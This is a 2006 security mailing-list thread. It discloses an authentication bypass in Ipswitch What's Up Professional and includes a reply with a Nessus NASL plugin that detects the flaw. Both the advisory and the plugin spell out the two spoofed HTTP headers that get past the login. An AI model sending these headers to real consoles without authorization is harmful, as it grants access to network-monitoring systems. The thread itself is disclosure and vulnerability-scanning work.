What's Up Professional Spoofing Authentication Bypass May 17 2006 11:53AM
Kenneth F. Belva (ken ftusecurity com) (1 replies)
Re: [Full-disclosure] What's Up Professional Spoofing Authentication Bypass May 17 2006 10:36PM
David Maciejak (david maciejak gmail com)
I should have detected this!
Find enclosed a NASL file to use with the Nessus scanner.

david

> What's Up Professional 2006 is vulnerable to a spoofing attack whereby
> the attacker can trick the application into thinking he/she is making a
> request from the console (which is considered trusted). This attack will
> allow the attacker to bypass the authentication mechanism of the
> application and login without credentials.
>
> The application believes that if it is passed the following headers in
> an HTTP request, then it is a trusted request:
> User-Agent: Ipswitch/1.0
> User-Application: NmConsole
>
> These headers can be easily spoofed. An easy way to accomplish the spoof
> is to use a webproxy such as webscarab (see owasp.org).
>
> I have put a more detailed text file here:
> http://www.ftusecurity.com/pub/whatsup.public.pdf
>
> I contacted IPSwitch. They said the issue would be fixed in the next
> release. I followed up twice to find a status and did not receive a reply.
>
> Since the release of some What's Up Professional vulnerabilities
> recently -- see: http://www.securityfocus.com/archive/1/433808 -- I
> decided to release this information. I've been burned in the past by
> reporting vulnerabilities responsibly to vendors, someone else
> irresponsibly discloses the issue publicly before the fix is released
> and the company does not credit me with the initial report.
>
> Sincerely,
> Kenneth F. Belva, CISSP
> http://www.ftusecurity.com
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
#
# This script was written by David Maciejak <david dot maciejak at kyxar dot fr>
# This script is released under the GNU GPL v2
#

if (description)
{
  # Registration phase: the scanner loads the plugin once with
  # `description` set and only records the metadata below; the actual
  # check further down never runs in this mode.
  script_id(20000);
  script_version("$Revision: 1.0 $");
  # script_bugtraq_id();

  script_name(english:"Ipswitch WhatsUp Professional Authentication bypass detection");

  # Report text shown when the check fires; the risk rating was left
  # unfinished by the author.
  script_description(english:"
Synopsis:

The remote host appears to be running Ipswitch WhatsUp Professional.

Description:

This product is used to monitor states of applications, services and hosts.

This version is prone to authentication bypass flaw, a malicious user can
access your software without having valid credential.

See also:

http://www.ipswitch.com/products/whatsup/professional/

Risk factor :

Low / CVSS Base Score: ?????");

  script_summary(english:"Checks for Ipswitch WhatsUp Professional Authentication Bypass");

  # Non-intrusive: a single GET, no state is changed on the target.
  script_category(ACT_GATHER_INFO);

  script_copyright(english:"This script is Copyright (C) 2006 David Maciejak");

  script_family(english:"Misc.", francais:"Divers");

  # Needs the web-server discovery plugin to have run first so that
  # Services/www is populated; 80 and 8022 are the fallback ports.
  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80, 8022);
  exit(0);
}

#code

include("http_func.inc");
include("http_keepalive.inc");

# Candidate web ports: whatever is registered under Services/www in the
# knowledge base, always extended with 8022; with nothing in the KB,
# fall back to 80 and 8022.  make_list() flattens a list argument, so
# a KB entry that already holds 8022 yields that port twice.
www_ports = get_kb_list("Services/www");
ports = make_list(80, 8022);
if (!isnull(www_ports))
  ports = make_list(8022, www_ports);

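foreach port (ports)
{
  # Skip ports the scanner already knows to be closed.
  if (get_port_state(port))
  {
    # Request the console's navigation page carrying the two headers the
    # product accepts as proof that the request originates from its own
    # console (User-Agent: Ipswitch/1.0, User-Application: NmConsole).
    # No credentials are sent, so a build that validates a session must
    # not answer with the device-list page.
    # The Accept header is one line; the mailing-list copy had wrapped
    # it in the middle of "text/plain", which broke the string literal.
    req = string(
      "GET ", "/NmConsole/Navigation.asp", " HTTP/1.1\r\n",
      "Host: ", get_host_name(), "\r\n",
      "User-Agent: Ipswitch/1.0", "\r\n",
      "User-Application: NmConsole", "\r\n",
      "Accept: text/xml,application/xml,application/xhtml+xml,text/html,q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "\r\n",
      "Accept-Language: en-us,en;q=0.5", "\r\n",
      "Accept-Encoding: gzip,deflate", "\r\n",
      "Keep-Alive: 300", "\r\n",
      "Proxy-Connection: keep-alive", "\r\n",
      "Referer: ", get_host_name(), "\r\n", "\r\n"
    );

    res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

    # A port that does not answer must not end the whole plugin: the
    # remaining candidate ports still have to be checked, so an
    # unanswered request only skips this port (previously exit(0) here
    # stopped the scan at the first silent port).
    #
    # Only the page title is matched.  The plugin does not confirm that
    # the same page is refused without the spoofed headers, so a console
    # that is simply unauthenticated is reported the same way.
    if (!isnull(res) &&
        "<title>Group Device List for My Network - Ipswitch WhatsUp Professional" >< res)
    {
      security_note(port);
    }
  }
}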



 
